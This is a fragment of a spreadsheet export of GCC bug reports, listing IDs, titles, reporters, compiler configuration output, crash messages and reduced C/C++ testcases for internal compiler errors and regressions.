COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-unknown-linux-gnu/4.5.2-pre9999/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.5.2_pre9999/work/gcc-4.5.2-9999/configure --prefix=/usr --bindir=/usr/x86_64-unknown-linux-gnu/gcc-bin/4.5.2-pre9999 --includedir=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.5.2-pre9999/include --datadir=/usr/share/gcc-data/x86_64-unknown-linux-gnu/4.5.2-pre9999 --mandir=/usr/share/gcc-data/x86_64-unknown-linux-gnu/4.5.2-pre9999/man --infodir=/usr/share/gcc-data/x86_64-unknown-linux-gnu/4.5.2-pre9999/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.5.2-pre9999/include/g++-v4 --host=x86_64-unknown-linux-gnu --build=x86_64-unknown-linux-gnu --disable-altivec --disable-fixed-point --with-ppl --with-cloog --enable-lto --disable-nls --with-system-zlib --disable-werror --enable-secureplt --enable-multilib --disable-libmudflap --disable-libssp --enable-libgomp --enable-cld --with-python-dir=/share/gcc-data/x86_64-unknown-linux-gnu/4.5.2-pre9999/python --enable-checking=release --disable-libgcj --enable-languages=cc++ --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo SVN'
Thread model: posix
gcc version 4.5.2-pre9999 20101130 (prerelease) rev. 167289 (Gentoo SVN)</t>
  </si>
  <si>
    <t>GCC-5556</t>
  </si>
  <si>
    <t>linker problem</t>
  </si>
  <si>
    <t>I just install sparc/solaris 7 and inatll gcc from www.sunfreeware.com
and I write a simple c++ code called welcome.cpp the compiler is
passed but I executes a.out there is an error:
ld.so.1: ./a.out: fatal: libstdc++.so.3: open failed: No such file or directory
Killed
I am new to gcc I need help immediately.
Release:
gcc-3.0.3
Environment:
sun solaris 2.7</t>
  </si>
  <si>
    <t>xliu</t>
  </si>
  <si>
    <t>GCC-14550</t>
  </si>
  <si>
    <t>[4.0 regression] trouble with pointers in templates</t>
  </si>
  <si>
    <t>The 3.4 branch ICEs on this valid code snippet:
=======================================
struct A
{
    A()
}
template void foo()
{
    A *p=new A
}
void bar()
{
    foo()
}
=======================================
bug.cc: In function `void foo() [with int  = 0]':
bug.cc:13:   instantiated from here
bug.cc:8: internal compiler error: in find_function_data at function.c:315
Please submit a full bug report [etc.]
And mainline rejects it:
bug.cc: In function `void foo() [with int  = 0]':
bug.cc:13:   instantiated from here
bug.cc:8: error: invalid use of 'A::A' to form a pointer-to-member-function. 
Use a qualified-id.
Mark I think this is a showstopper for 3.4.0.
If you agree could you please adjust the target milestone?</t>
  </si>
  <si>
    <t>GCC-59909</t>
  </si>
  <si>
    <t>Quad memory bootstrap issues on little endian powerpc64 power8 systems</t>
  </si>
  <si>
    <t>Using the current sources the GCC 4.9 compiler will not bootstrap if the default target is power8 on a little endian system.  The cause is the new quad word load/store support does not deal with swapping words after doing the load and before doing the store.</t>
  </si>
  <si>
    <t>GCC-49772</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: in ipa_pta_execute at tree-ssa-structalias.c:6790 with -fipa-pta</t>
  </si>
  <si>
    <t>Created attachment 24784
reduced testcase (from g++.dg/tree-ssa/pr42337.C)
Compiler output:
$ gcc -O -fipa-pta testcase.C 
testcase.C: In member function 'int S &gt;::foo() [with  = int]':
testcase.C:4:39: error: inlining failed in call to always_inline 'int S &gt;::foo() [with  = int]': recursive inlining
testcase.C:7:7: error: called from here
testcase.C: At global scope:
testcase.C:16:1: internal compiler error: in ipa_pta_execute at tree-ssa-structalias.c:6790
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Compiler output - 4.6:
$ gcc -O -fipa-pta testcase.C 
testcase.C: In function 'void foo()':
testcase.C:4:39: sorry unimplemented: inlining failed in call to 'int S &gt;::foo() [with  = int]': recursive inlining
testcase.C:7:7: sorry unimplemented: called from here
Tested revisions:
r176370 - crash
4.6 r176280 - sorry</t>
  </si>
  <si>
    <t>GCC-60598</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in maybe_record_trace_start at dwarf2cfi.c:2239</t>
  </si>
  <si>
    <t>Created attachment 32401
testcase
For example building libnettle on s390x (happens for many more packages) results
in
gcc -I.  -DHAVE_CONFIG_H -fmessage-length=0 -grecord-gcc-switches -fstack-protector -O2 -Wall -D_FORTIFY_SOURCE=2 -funwind-tables -fasynchronous-unwind-tables -Wno-coverage-mismatch -g -ggdb3 -Wno-pointer-sign -Wall -W   -Wmissing-prototypes -Wmissing-declarations -Wstrict-prototypes   -Wpointer-arith -Wbad-function-cast -Wnested-externs -fpic  -fpic -c camellia-set-decrypt-key.c
camellia-set-decrypt-key.c: In function 'nettle_camellia_invert_key':
camellia-set-decrypt-key.c:53:1: internal compiler error: in maybe_record_trace_start at dwarf2cfi.c:2239
 }
 ^
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-56890</t>
  </si>
  <si>
    <t>invalid fdtox instruction in 64-bit mode with -O2</t>
  </si>
  <si>
    <t>Created attachment 29835
Minimal test case (only for -O2)
gcc 4.7.2
config.nice:
Will attach minimal C test case and assembler file.
GCC flags: gcc -m64 -O2
Error message:
/usr/ccs/bin/as: test.s line 29: error: invalid (misaligned) register
Problematic assembler line:
        fdtox   %f8 %f9
Sun assembler version:
/usr/ccs/bin/as: SunOS 5.10 118683-08 Patch 07/05/2012
It seems the second argument needs an even register number.
Another reporter also ran into the problem with GCC 4.6.3 but this works here so maybe a problem with one of the helper libraries mpc gmp mpfr?
Bug also reported for FreeBSD/sparc64.
A slightly bigger test case closer to the original code (also attached) also gives an error when compiling only with -O or -O1 instead of -O2:
test.c: In function 'buggy':
test.c:13:1: error: insn does not satisfy its constraints:
(insn 103 38 39 3 (set (reg:HI 40 %f8 [151])
        (reg:HI 42 %f10)) test.c:6 58 {*movhi_insn}
     (nil))
test.c:13:1: internal compiler error: in reload_cse_simplify_operands at postreload.c:403
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Original bug report was against the Apache Web Server: https://issues.apache.org/bugzilla/show_bug.cgi?id=52900
Regards
Rainer</t>
  </si>
  <si>
    <t>rainer.jung</t>
  </si>
  <si>
    <t>GCC-35986</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3/4.4 regression] ICE with ambiguous template functions</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.0.1:
================================
namespace
{
  template void foo(...)
}
template void foo(...)
void bar()
{
  foo(0)
}
================================
bug.cc: In function 'void bar()':
bug.cc:10: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
In GCC 4.0.0 and earlier we got a correct error message:
bug.cc: In function 'void bar()':
bug.cc:10: error: call of overloaded 'foo(int)' is ambiguous
bug.cc:6: note: candidates are: void foo(...) [with int  = 0]
bug.cc:3: note:                 void::foo(...) [with int  = 0]</t>
  </si>
  <si>
    <t>GCC-9970</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] previously declared inline friend can't access members</t>
  </si>
  <si>
    <t>The below testcase:
---------- snip -------------
/* Per 11.4 #5 an inline friend declared function
   has access to class members.  */
void f()
struct X
{
  enum { k = 1 }
  friend void f() {
        char a[k]
  }
}
------------- snap ----------
compiled with either version of 3.3 and HEAD gives the error:
  bla.cc:8:error: `k' undeclared (first use this function)
Per 11.4 #5 the inline defined friend f() of X has access to the members of X.
So this is conforming code but not accepted.
GCC 3.2 did compile this.
Release:
3.4 20030304 3.3 20030226
Environment:
i686-linux
How-To-Repeat:
compile the above snippet.</t>
  </si>
  <si>
    <t>GCC-14679</t>
  </si>
  <si>
    <t>[3.4? Regression] g++ (3.4.0 20040317 (prerelease) ) failes to compile valid code (ICE)</t>
  </si>
  <si>
    <t>The code in question is part of a larger framework. Previous versions of gcc ( 3.3.2 3.2.3 ) 
icc 8.0 msvc++ 7.1 compile the code without problems.  
Gcc 3.4 gives the message  
internal compiler error: in find_function_data at function.c:315</t>
  </si>
  <si>
    <t>andreas.wimmer</t>
  </si>
  <si>
    <t>GCC-57568</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] wrong code for assignment in conditional at -Os</t>
  </si>
  <si>
    <t>The following code is miscompiled by gcc trunk and 4.8 on x86_64-linux at -Os and above optimization levels in 32-bit mode (should print nothing).  This is a regression from 4.7.x.
$ gcc-trunk -v
gcc version 4.9.0 20130608 (experimental) [trunk revision 199849] (GCC) 
$ gcc-trunk -O1 -m32 reduced.c 
$ ./a.out 
$ gcc-4.7 -Os -m32 reduced.c 
$ ./a.out 
$ gcc-trunk -Os -m32 reduced.c 
$ ./a.out 
1
$
---------------
int printf (const char * ...)
int a[6][9] = {}
int b = 1
int *c = 
int main ()
{
  if (b)
    if (*c = *c + *c)
      printf (%d\n a[3][5])
  return 0
}</t>
  </si>
  <si>
    <t>GCC-34018</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE: verify_stmts failed</t>
  </si>
  <si>
    <t>Platform:
  Fedora release 7 (Moonshine)
  Linux idle.lbl.gov 2.6.22.9-91.fc7 #1 SMP Thu Sep 27 20:47:39 EDT 2007 x86_64 x86_64 x86_64 GNU/Linux
% g++ -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /net/rosie/scratch2/rwgk/gcc_trunk/configure --prefix=/net/cci-filer1/vol1/tmp/rwgk/gcc_trunk_129944_x86_64_fc7 --enable-languages=cc++fortran --with-mpfr=/usr
Thread model: posix
gcc version 4.3.0 20071106 (experimental) (GCC) 
I'll upload a small standalone reproducer.
To reproduce the problem:
% g++ -c -O1 ~/verify_stmts_failed.cpp
/net/cci/rwgk/verify_stmts_failed.cpp: In constructor 'triangulation::triangulation(const tiny&amp;)':
/net/cci/rwgk/verify_stmts_failed.cpp:73: error: invalid operand to binary operator
/net/cci/rwgk/verify_stmts_failed.cpp:73: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
It works with these alternative commands:
  g++ -c -O1 ~/verify_stmts_failed.cpp -DDISABLE_INLINE
  g++ -c ~/verify_stmts_failed.cpp
It also works with many other compilers including all older g++.
Ralf</t>
  </si>
  <si>
    <t>GCC-63608</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] error: type mismatch in binary expression</t>
  </si>
  <si>
    <t>Created attachment 33765
testcase
gcc hello.c -S -O2  -w  -m32 -v
Using built-in specs.
COLLECT_GCC=x86_install/bin/gcc
Target: x86_64-unknown-linux-gnu
Configured with: gcc-4.8-branch/configure --prefix=x86_install --enable-languages=cc++ --enable-threads=posix --disable-multilib --with-system-zlib --disable-nls --enable-__cxa_atexit --enable-checking --with-system-zlib --enable-lto --disable-bootstrap
Thread model: posix
gcc version 4.8.4 20140911 (prerelease) (GCC) 
COLLECT_GCC_OPTIONS='-S' '-O2' '-w' '-m32' '-v' '-mtune=generic' '-march=x86-64'
 x86_install/libexec/gcc/x86_64-unknown-linux-gnu/4.8.4/cc1 -quiet -v -imultilib . hello.c -quiet -dumpbase hello.c -m32 -mtune=generic -march=x86-64 -auxbase hello -O2 -w -version -o hello.s
GNU C (GCC) version 4.8.4 20140911 (prerelease) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.3.4 GMP version 5.1.3 MPFR version 3.1.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring nonexistent directory x86_install/lib/gcc/x86_64-unknown-linux-gnu/4.8.4/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 x86_install/lib/gcc/x86_64-unknown-linux-gnu/4.8.4/include
 /usr/local/include
 x86_install/include
 x86_install/lib/gcc/x86_64-unknown-linux-gnu/4.8.4/include-fixed
 /usr/include
End of search list.
GNU C (GCC) version 4.8.4 20140911 (prerelease) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.3.4 GMP version 5.1.3 MPFR version 3.1.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 741d6eabab2d80d9f09742b3a0e5d8b6
hello.c: In function 'fn1':
hello.c:7:5: error: type mismatch in binary expression
 int fn1 ()
     ^
long int
long int
long unsigned int
D.1709 = D.1708 | 2248593032
hello.c:7:5: internal compiler error: verify_gimple failed
0xa9362b verify_gimple_in_seq(gimple_statement_d*)
        gcc-4.8-branch/gcc/tree-cfg.c:4515
0x86182c gimplify_body(tree_node* bool)
        gcc-4.8-branch/gcc/gimplify.c:8421
0x861aef gimplify_function_tree(tree_node*)
        gcc-4.8-branch/gcc/gimplify.c:8534
0x6a8903 cgraph_analyze_function
        gcc-4.8-branch/gcc/cgraphunit.c:665
0x6ab3f0 cgraph_analyze_functions
       gcc-4.8-branch/gcc/cgraphunit.c:973
0x6ab87f finalize_compilation_unit()
        gcc-4.8-branch/gcc/cgraphunit.c:2119
0x54e284 c_write_global_declarations()
        gcc-4.8-branch/gcc/c/c-decl.c:10120
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>yueming.yang</t>
  </si>
  <si>
    <t>GCC-65578</t>
  </si>
  <si>
    <t>FAIL: gcc.target/arm/builtin-bswap-1.c (test for excess errors)</t>
  </si>
  <si>
    <t>gcc.target/arm/builtin-bswap-1.c compilation fails like this:
...
spawn /data/devel/lean-c/build/gcc/xgcc -B/data/devel/lean-c/build/gcc/ src/gcc/testsuite/gcc.target/arm/builtin-bswap-1.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O2 -march=armv6 -ffat-lto-objects -ffat-lto-objects -ffat-lto-objects -ffat-lto-objects -ffat-lto-objects -ffat-lto-objects -ffat-lto-objects -ffat-lto-objects -ffat-lto-objects -ffat-lto-objects -S -o builtin-bswap-1.s^M
src/gcc/testsuite/gcc.target/arm/builtin-bswap-1.c: In function 'swaps16':^M
src/gcc/testsuite/gcc.target/arm/builtin-bswap-1.c:18:1: sorry unimplemented: Thumb-1 hard-float VFP ABI^M
compiler exited with status 1
output is:
src/gcc/testsuite/gcc.target/arm/builtin-bswap-1.c: In function 'swaps16':^M
src/gcc/testsuite/gcc.target/arm/builtin-bswap-1.c:18:1: sorry unimplemented: Thumb-1 hard-float VFP ABI^M
FAIL: gcc.target/arm/builtin-bswap-1.c (test for excess errors)
Excess errors:
src/gcc/testsuite/gcc.target/arm/builtin-bswap-1.c:18:1: sorry unimplemented: Thumb-1 hard-float VFP ABI
...
The testcase requires v6. So it first tests whether it can set the arm to v6 and then sets it:
...
/* { dg-require-effective-target arm_arch_v6_ok } */
/* { dg-add-options arm_arch_v6 } */
...
The effective target test succeeds but during compilation we find out that we actually can't compile AFAIU because of the combination -mthumb -march=armv6 -mhard-float.</t>
  </si>
  <si>
    <t>GCC-10470</t>
  </si>
  <si>
    <t>spurious warning about anonymous variadic macros were introduced in C99</t>
  </si>
  <si>
    <t>simple test.c test.h files compile without using pch
and generate strange warning if use test.h.gch
All case with options: g++ -ansi -pedantic -Werror -Winvalid-pch
-test.h----8&lt;-----------
#include
-test.h----&gt;8-----------
-test.cc---8&lt;-----------
#includetest.h
int main() {
  return 0
}
-test.cc---&gt;8-----------
Warning generated at line in concept_check.h:52 :
#define __glibcpp_function_requires(...)
Release:
3.4 20030423 (experimental)
Environment:
FreeBSD 4.7-RELEASE-p9</t>
  </si>
  <si>
    <t>GCC-5365</t>
  </si>
  <si>
    <t>gcjh -stubs does not include correct files</t>
  </si>
  <si>
    <t>When gcjh -stubs is used the stubs file generates the wrong include statements. For example if you use gcjh -stubs on java.lang.Object it generates a java/lang/Object.cc and a java/lang/Object.h file which includes the header file using #include . The correct include should be #include . It also does not include the gcj/cni.h file.
The stub functions also have JvFail in them and I can't find any references to this function in gcj/cni.h.
Release:
3.0.3
Environment:
Linux
How-To-Repeat:
gcj -stubs java.lang.Object</t>
  </si>
  <si>
    <t>nallen</t>
  </si>
  <si>
    <t>GCC-69282</t>
  </si>
  <si>
    <t>[6 Regression] aarch64/armhf ICE on SPEC2006 464.h264ref at -O3</t>
  </si>
  <si>
    <t>Created attachment 37345
aarch64 testcase generated with creduce ICE at -O3
I'm seeing an ICE compiling SPEC2006 464.h264ref at -O3 on aarch64 and armhf for the file slice.c.
The problem was created/exposed by the patch for bug 68215.
    https://gcc.gnu.org/bugzilla/show_bug.cgi?id=68215
The problem occurs in expand_vector_condition.  a_is_comparison is
false.  Before the patch aa is an ssa_name with type boolean returned
by tree_vec_extract.   This is passed to passed to gimplify_build3
which returns a cond_expr with type int.  After the patch aa is a
ne_expr with type boolean.  gimplify_build3 calls fold_build3_loc
which optimizes the cond_expr/ne_expr and returns a nop_expr of type
int of the boolean ne_expr.  gimplify_build3 then calls STRIP_NOPS
which removes the nop_expr and the end result here is a ne_expr with
a boolean type which is the wrong type for the constructor.
I don't have a lot of experience with the gimple work so I'm not sure
where this is going wrong.
I see a number of places in tree-vect-generic.c that add a
VIEW_CONVERT_EXPR if useless_type_convertsion_p is false.  That should
work except when I try this I see that the VIEW_CONVERT_EXPR gets
converted to a NOP_EXPR by gimplify_build1 and gets stripped again.
Maybe the gimplify_build* routines should be using
STRIP_USELESS_TYPE_CONVERSION instead of STRIP_NOPS?  That seems to
work but I don't know if that will have cascading effects.
Or maybe verify_gimple should allow bools and ints to mix in a
constructor?  That doesn't seem like the right solution to me.</t>
  </si>
  <si>
    <t>GCC-34005</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE: verify_ssa failed (expected an SSA_NAME object)</t>
  </si>
  <si>
    <t>With trunk from 20071105:
tbm@devel-tbm:~$ /usr/lib/gcc-snapshot/bin/gcc -c -O2 -ftree-vectorize vnc-Unwrap.c
vnc-Unwrap.c: In function 'XdmcpUnwrap':
vnc-Unwrap.c:4: error: expected an SSA_NAME object
vnc-Unwrap.c:4: error: in statement
base_off.31_46 = iftmp.32
vnc-Unwrap.c:4: internal compiler error: verify_ssa failed
This looks similar to PR33680 on the outset but appears to be different
(only happens on SPARC Jakub's patch from that PR doesn't help in this
case and when I change the testcase slightly I get a different ICE).</t>
  </si>
  <si>
    <t>GCC-35382</t>
  </si>
  <si>
    <t>Invalid gcc.dg/pr34351.c</t>
  </si>
  <si>
    <t>I got
/export/gnu/src/gcc/gcc/gcc/testsuite/gcc.dg/pr34351.c:4: error: invalid register name for 'x'
on Linu/ia32 since r13
register int * volatile x asm (r13) 
isn't a valid register.</t>
  </si>
  <si>
    <t>GCC-51344</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6/4.7 regression] cc1plus hangs when compiling</t>
  </si>
  <si>
    <t>After trying to compile one of old projects I ran into the situation when mingw32-g++ silently hanged up. After ah hour of research I refined the whole situation to this simple test file (evidently the main reason was the erratum but it was better to have the compile error and crashed build here then to have three hours of senseless CPU torturing).
 /////////////////////////////////////////
 // test.cpp 
 class A
 template 
 class B
 {
 friend __attribute__((cdecl)) A&amp; operator &gt;&gt;(A&amp; a B&amp; b)
 {
 return a
 }
 }
 //
 /////////////////////////////////////////
 Compiled with command:
 mingw32-g++ -v test.cpp
 Resulting output:
 Using built-in specs.
 COLLECT_GCC=mingw32-g++
 COLLECT_LTO_WRAPPER=c:/mingw/bin/../libexec/gcc/mingw32/4.5.2/lto-wrapper.exe
 Target: mingw32
 Configured with: ../gcc-4.5.2/configure --enable-languages=cc++adafortranobjcobj-c++ --disable-sjlj-exceptions --with-dwarf2 --enable-shared --enable-libgomp --disable-win32-registry --enable-libstdcxx-debug --enable-version-specific-runtime-libs --disable-werror --build=mingw32 --prefix=/mingw
 Thread model: win32
 gcc version 4.5.2 (GCC) 
 COLLECT_GCC_OPTIONS='-v' '-shared-libgcc' '-mtune=i386' '-march=i386'
 c:/mingw/bin/../libexec/gcc/mingw32/4.5.2/cc1plus.exe -quiet -v -iprefix c:\mingw\bin\../lib/gcc/mingw32/4.5.2/ appdict.cpp -quiet -dumpbase appdict.cpp -mtune=i386 -march=i386 -auxbase appdict -version -o C:\DOCUME~1\9335~1\LOCALS~1\Temp\ccenojSj.s
 GNU C++ (GCC) version 4.5.2 (mingw32)
 compiled by GNU C version 4.5.2 GMP version 5.0.1 MPFR version 2.4.1 MPC version 0.8.1
 GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
 ignoring nonexistent directory c:\mingw\bin\../lib/gcc/mingw32/4.5.2/../../../../mingw32/include
 ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.5.2/include/c++
 ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.5.2/include/c++/mingw32
 ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.5.2/include/c++/backward
 ignoring duplicate directory /mingw/lib/gcc/mingw32/4.5.2/../../../../include
 ignoring duplicate directory c:/mingw/lib/gcc/../../include
 ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.5.2/include
 ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.5.2/include-fixed
 ignoring nonexistent directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.5.2/../../../../mingw32/include
 ignoring duplicate directory /mingw/include
 #include ... search starts here:
 #include  search starts here:
 c:\mingw\bin\../lib/gcc/mingw32/4.5.2/include/c++
 c:\mingw\bin\../lib/gcc/mingw32/4.5.2/include/c++/mingw32
 c:\mingw\bin\../lib/gcc/mingw32/4.5.2/include/c++/backward
 c:\mingw\bin\../lib/gcc/mingw32/4.5.2/../../../../include
 c:\mingw\bin\../lib/gcc/mingw32/4.5.2/include
 c:\mingw\bin\../lib/gcc/mingw32/4.5.2/include-fixed
 End of search list.
 GNU C++ (GCC) version 4.5.2 (mingw32)
 compiled by GNU C version 4.5.2 GMP version 5.0.1 MPFR version 2.4.1 MPC version 0.8.1
 GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
 Compiler executable checksum: bba7c68567cab1560329ee702fa8a945
 ^C
This bug is a copy from https://sourceforge.net/tracker/?func=detail&amp;atid=102435&amp;aid=3444236&amp;group_id=2435</t>
  </si>
  <si>
    <t>koliasvskj</t>
  </si>
  <si>
    <t>GCC-58336</t>
  </si>
  <si>
    <t>internal compiler error when using a static int for the size of a char array within a class</t>
  </si>
  <si>
    <t>Hi
I hit a compiler error when compiling the following code with g++ 4.7.2:
static int b  = 5
class A
{
public :
  A()
}
A::A() {
    char c[b]
}
------------------------------------------------------
This compilation example is with a powerpc cross compiler but a x86 compiler shows the same result.
powerpc-gcc -v -save-temps -g -c file.cpp 
Using built-in specs.
COLLECT_GCC=powerpc-gcc
Target: powerpc-linux
Configured with: /opt/eldk/build/eldk-rel-v5.4-2013-08-02-9a46fd5-powerpc/tmp/work-shared/gcc-4.7.2-r20/gcc-4.7.2/configure --build=x86_64-linux --host=i686-eldk-linux --target=powerpc-linux --prefix=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/usr --exec_prefix=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/usr --bindir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/usr/bin/powerpc-linux --sbindir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/usr/bin/powerpc-linux --libexecdir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/usr/libexec/powerpc-linux --datadir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/usr/share --sysconfdir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/etc --sharedstatedir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/com --localstatedir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/var --libdir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/usr/lib/powerpc-linux --includedir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/usr/include --oldincludedir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/usr/include --infodir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/usr/share/info --mandir=/opt/eldk-5.4/powerpc/sysroots/i686-eldk-linux/usr/share/man --disable-silent-rules --disable-dependency-tracking --with-libtool-sysroot=/opt/eldk/build/eldk-rel-v5.4-2013-08-02-9a46fd5-powerpc/tmp/sysroots/i686-nativesdk-eldk-linux --with-gnu-ld --enable-shared --enable-languages=cc++ --enable-threads=posix --disable-multilib --enable-c99 --enable-long-long --enable-symvers=gnu --enable-libstdcxx-pch --program-prefix=powerpc-linux- --without-local-prefix --enable-lto --enable-libssp --disable-bootstrap --disable-libmudflap --with-system-zlib --with-linker-hash-style=gnu --enable-linker-build-id --with-ppl=no --with-cloog=no --enable-checking=release --enable-cheaders=c_global --with-gxx-include-dir=/opt/eldk-5.4/powerpc/sysroots/powerpc-linux/usr/include/c++ --with-build-time-tools=/opt/eldk/build/eldk-rel-v5.4-2013-08-02-9a46fd5-powerpc/tmp/sysroots/x86_64-linux/usr/powerpc-linux/bin --with-sysroot=/opt/eldk-5.4/powerpc/sysroots/powerpc-linux --with-build-sysroot=/opt/eldk/build/eldk-rel-v5.4-2013-08-02-9a46fd5-powerpc/tmp/sysroots/generic-powerpc --disable-libunwind-exceptions --disable-libssp --disable-libgomp --disable-libmudflap --with-mpfr=/opt/eldk/build/eldk-rel-v5.4-2013-08-02-9a46fd5-powerpc/tmp/sysroots/i686-nativesdk-eldk-linux --with-mpc=/opt/eldk/build/eldk-rel-v5.4-2013-08-02-9a46fd5-powerpc/tmp/sysroots/i686-nativesdk-eldk-linux --enable-nls --enable-__cxa_atexit --with-long-double-128
Thread model: posix
gcc version 4.7.2 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-g' '-c'
 /opt/keymile/ELDK/eldk_5_4-km.git/powerpc/sysroots/i686-eldk-linux/usr/bin/powerpc-linux/../../libexec/powerpc-linux/gcc/powerpc-linux/4.7.2/cc1plus -E -quiet -v -iprefix /opt/keymile/ELDK/eldk_5_4-km.git/powerpc/sysroots/i686-eldk-linux/usr/bin/powerpc-linux/../../lib/powerpc-linux/gcc/powerpc-linux/4.7.2/ -D_GNU_SOURCE -D__unix__ -D__gnu_linux__ -D__linux__ -Dunix -D__unix -Dlinux -D__linux -Asystem=linux -Asystem=unix -Asystem=posix file.cpp -g -fworking-directory -fpch-preprocess -o file.ii
ignoring nonexistent directory /opt/keymile/ELDK/eldk_5_4-km.git/powerpc/sysroots/i686-eldk-linux/usr/bin/powerpc-linux/../../lib/powerpc-linux/gcc/powerpc-linux/4.7.2/../../../../../powerpc-linux/include
ignoring duplicate directory /opt/keymile/ELDK/eldk_5_4-km.git/powerpc/sysroots/i686-eldk-linux/usr/bin/powerpc-linux/../../lib/powerpc-linux/gcc/../../../lib/powerpc-linux/gcc/powerpc-linux/4.7.2/include
ignoring duplicate directory /opt/keymile/ELDK/eldk_5_4-km.git/powerpc/sysroots/i686-eldk-linux/usr/bin/powerpc-linux/../../lib/powerpc-linux/gcc/../../../lib/powerpc-linux/gcc/powerpc-linux/4.7.2/include-fixed
ignoring nonexistent directory /opt/keymile/ELDK/eldk_5_4-km.git/powerpc/sysroots/i686-eldk-linux/usr/bin/powerpc-linux/../../lib/powerpc-linux/gcc/../../../lib/powerpc-linux/gcc/powerpc-linux/4.7.2/../../../../../powerpc-linux/include
#include ... search starts here:
#include  search starts here:
 /opt/keymile/ELDK/eldk_5_4-km.git/powerpc/sysroots/i686-eldk-linux/usr/bin/powerpc-linux/../../lib/powerpc-linux/gcc/powerpc-linux/4.7.2/include
 /opt/keymile/ELDK/eldk_5_4-km.git/powerpc/sysroots/i686-eldk-linux/usr/bin/powerpc-linux/../../lib/powerpc-linux/gcc/powerpc-linux/4.7.2/include-fixed
 /opt/eldk-5.4/powerpc/sysroots/powerpc-linux/usr/include/c++
 /opt/eldk-5.4/powerpc/sysroots/powerpc-linux/usr/include/c++/powerpc-linux
 /opt/eldk-5.4/powerpc/sysroots/powerpc-linux/usr/include/c++/backward
 /opt/eldk-5.4/powerpc/sysroots/powerpc-linux/usr/local/include
 /opt/eldk-5.4/powerpc/sysroots/powerpc-linux/usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-g' '-c'
 /opt/keymile/ELDK/eldk_5_4-km.git/powerpc/sysroots/i686-eldk-linux/usr/bin/powerpc-linux/../../libexec/powerpc-linux/gcc/powerpc-linux/4.7.2/cc1plus -fpreprocessed file.ii -quiet -dumpbase file.cpp -auxbase file -g -version -o file.s
GNU C++ (GCC) version 4.7.2 (powerpc-linux)
	compiled by GNU C version 4.7.2 GMP version 5.1.0 MPFR version 3.1.1 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.7.2 (powerpc-linux)
	compiled by GNU C version 4.7.2 GMP version 5.1.0 MPFR version 3.1.1 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 5729b3532d48628ac91bacce44c8a59d
file.cpp: In constructor 'A::A()':
file.cpp:11:1: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>holger.brunck</t>
  </si>
  <si>
    <t>GCC-77398</t>
  </si>
  <si>
    <t>first argument to va_arg not of type va_list error hidden by other error</t>
  </si>
  <si>
    <t>Consider test-case:
...
struct A {}
void
foo (void)
{
  __builtin_va_arg (0 A)
}
...
Compiling this with g++ gives the error:
...
error: first argument to â€˜va_argâ€™ not of type â€˜va_listâ€™
...
Now we add ++ in front of the expression and get:
...
struct A {}
void
foo (void)
{
  ++__builtin_va_arg (0 A)
}
...
Compiling this with g++ gives this error:
...
